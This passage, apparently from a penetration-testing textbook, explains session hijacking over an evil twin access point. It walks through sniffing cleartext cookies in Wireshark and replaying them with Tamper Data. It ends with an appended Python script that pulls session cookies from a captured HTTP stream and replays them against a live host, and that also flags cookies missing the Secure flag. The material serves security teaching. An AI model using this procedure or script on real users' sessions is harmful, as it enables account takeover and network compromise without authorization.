Session hijacking is a technique that's used to gain unauthorized access to information or an account by exploiting a valid computer session. Sometimes, it is also referred to as cookie hijacking as cookies are often used to track the user session. By stealing a cookie from the client session, an attacker can spoof the client and perform activities on behalf of the legitimate client.
When a user requests a protected resource on a domain, they are prompted to authenticate. After a successful login with a valid username and password, the web server assigns the client a unique value so that it can recognise that user on subsequent requests. This value is commonly called a session cookie: it is created by the web server, stored by the client's browser, and sent back with every request for as long as the session lasts. If the application sends it over plain HTTP, an attacker positioned between the client and the web server, such as on the wireless interface of our evil twin access point, can sniff the traffic and read the session cookie straight out of the request headers. This allows the attacker to impersonate the client and interact with the web application without ever knowing the username and password. Note that this only works when the cookie actually crosses the network in cleartext: a cookie that is set with the Secure flag and only ever transmitted over HTTPS cannot be captured this way.
To demonstrate how session hijacking occurs, suppose that the victim browses to http://infosecawareness.in and logs in with his credentials to gain access to the website. On successful login, a cookie is created for the session and is used to track the user. If the attacker can extract that cookie from the HTTP session, it can be used to hijack the session and perform activities on the target website without the user's knowledge. Because the victim is connected through the attacker's access point, all of the session data passes through the attacker's machine and can be seen in Wireshark. The attacker can read the cookies sent by the victim's browser in plain text and take over the session between that browser and the web server.
Once the user session is hijacked, the attacker can potentially change the user's password, post comments on behalf of the user, or update the user profile. If the website that the user is visiting is the administrative console of an infrastructure device, the attacker can also download or change the configuration, which can lead to further compromise of the network.
In this section, we will perform session hijacking on clients connected to our evil twin access point. Once a user session is compromised, we will extract useful information that will help us penetrate the network further. The prerequisite for this attack is, once again, that we are in the path of the client traffic. There are several ways to accomplish this, as discussed previously in this chapter, using either hostapd or airbase-ng.
In this example, we will sniff the data traffic using Wireshark and extract the session cookie so that we can access the user's session from the attacker machine. We will also use Tamper Data, a Firefox add-on that can capture, alter, and replay HTTP requests. Follow these steps:
Start Wireshark on the attacker machine from a root shell:
# wireshark
You should be able to see the following screenshot:
Enter infosecawareness.in/@@personal-preferences in the address bar of the web browser. Tamper Data will prompt you to modify the request content; when prompted, click on the Tamper button, replace the Cookie header of the outgoing request with the session cookie value captured in Wireshark, and submit the request.
The following screenshot is the hijacked session displayed on the attacker's machine:
The attacker has successfully logged in to the website simply by hijacking the user's session, and now has the ability to change the password or perform other malicious activities on the logged-in account. We have also seen how this type of attack can potentially be used against certain administrative interfaces to bypass user authentication.
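The two halves of the procedure above, pulling the session cookie out of the captured cleartext traffic and building the request that Tamper Data replays with it, as an added Python example that is not part of the original text. The capture is constructed to resemble a Wireshark "Follow TCP Stream" view; the host and path are the ones used in this section, while the cookie name __ac, its value, the second request to cdn.example.org, and the Set-Cookie line in the response are assumptions. The last function sends the replayed request over plain HTTP and needs network access to the target, so it is shown only as usage.

```python
"""Extract a session cookie from captured plaintext HTTP and build the replay request.

Added example, not part of the original text. CAPTURED_STREAM is constructed
to look like Wireshark's "Follow TCP Stream" output; the cookie name __ac and
every value in it are assumptions.
"""
import re
from http.client import HTTPConnection

# Constructed capture (not real traffic): the victim's authenticated request,
# the server's response (re-issuing the cookie without the Secure flag), and a
# later request to another host that carries no session cookie.
CAPTURED_STREAM = (
    b"GET /@@personal-preferences HTTP/1.1\r\n"
    b"Host: infosecawareness.in\r\n"
    b"User-Agent: Mozilla/5.0\r\n"
    b'Cookie: __ac=NjA0ZWE2NDQ6cGFzc3dvcmQ; I18N_LANGUAGE="en"\r\n'
    b"Connection: keep-alive\r\n"
    b"\r\n"
    b"HTTP/1.1 200 OK\r\n"
    b"Content-Type: text/html\r\n"
    b"Set-Cookie: __ac=NjA0ZWE2NDQ6cGFzc3dvcmQ; Path=/; HttpOnly\r\n"
    b"Content-Length: 20\r\n"
    b"\r\n"
    b"<html>welcome</html>"
    b"GET /logo.png HTTP/1.1\r\n"
    b"Host: cdn.example.org\r\n"
    b"\r\n"
)

# Cookie names that common frameworks use for the authenticated session
# (__ac is Plone's; the others are PHP, Java, Django and ASP.NET defaults).
SESSION_COOKIE_NAMES = {"__ac", "PHPSESSID", "JSESSIONID", "sessionid", "ASP.NET_SessionId"}

# A request line may directly follow a response body, so it is not anchored at a line start.
REQUEST_LINE = re.compile(rb"(GET|POST|PUT|DELETE|HEAD) (/\S*) HTTP/1\.[01]\r\n")
SET_COOKIE = re.compile(rb"Set-Cookie: ([^=\r\n]+)=[^;\r\n]*((?:;[^\r\n]*)?)\r\n")


def extract_requests(stream: bytes) -> list:
    """Return every HTTP request in the capture as {"method", "path", "headers"}."""
    requests = []
    for m in REQUEST_LINE.finditer(stream):
        head_end = stream.find(b"\r\n\r\n", m.end())
        if head_end < 0:
            continue  # truncated capture: the header block never finished
        headers = {}
        for line in stream[m.end():head_end].decode("latin-1").split("\r\n"):
            if ":" in line:
                name, value = line.split(":", 1)
                headers[name.strip().lower()] = value.strip()
        requests.append({"method": m.group(1).decode(), "path": m.group(2).decode(), "headers": headers})
    return requests


def session_cookies(requests: list) -> list:
    """(host, cookie name, value) for every request that carries a known session cookie."""
    found = []
    for req in requests:
        for part in req["headers"].get("cookie", "").split(";"):
            if "=" in part:
                name, value = part.strip().split("=", 1)
                if name in SESSION_COOKIE_NAMES:
                    found.append((req["headers"].get("host", ""), name, value))
    return found


def cookies_missing_secure(stream: bytes) -> list:
    """Names of cookies the server set without the Secure flag, i.e. the ones a
    browser will keep sending over plain HTTP where they can be sniffed."""
    missing = []
    for m in SET_COOKIE.finditer(stream):
        attrs = [a.strip() for a in m.group(2).decode().lower().split(";")]
        if "secure" not in attrs:
            missing.append(m.group(1).decode().strip())
    return missing


def build_replay_request(host: str, path: str, name: str, value: str) -> bytes:
    """The raw request Tamper Data ends up sending once the Cookie header is
    replaced with the stolen session cookie."""
    return (
        f"GET {path} HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        f"User-Agent: Mozilla/5.0\r\n"
        f"Cookie: {name}={value}\r\n"
        f"Connection: close\r\n"
        f"\r\n"
    ).encode()


def replay(host: str, path: str, name: str, value: str) -> int:
    """Send the hijacked request over plain HTTP and return the status code.
    Needs network access to the target, so it is not exercised offline."""
    conn = HTTPConnection(host, 80, timeout=10)
    conn.request("GET", path, headers={"Cookie": f"{name}={value}", "User-Agent": "Mozilla/5.0"})
    status = conn.getresponse().status
    conn.close()
    return status


if __name__ == "__main__":
    reqs = extract_requests(CAPTURED_STREAM)
    for host, name, value in session_cookies(reqs):
        print(f"stolen {name} for {host}: {value}")
        print(build_replay_request(host, "/@@personal-preferences", name, value).decode())
    print("set without Secure:", cookies_missing_secure(CAPTURED_STREAM))
```

Running the script against the constructed capture prints the stolen __ac value, the raw replay request, and the fact that the server re-issued the cookie without the Secure flag, which is exactly the condition that lets the browser keep sending it over plain HTTP through the evil twin. Pointing replay() at a real host is the programmatic equivalent of the Tamper Data step.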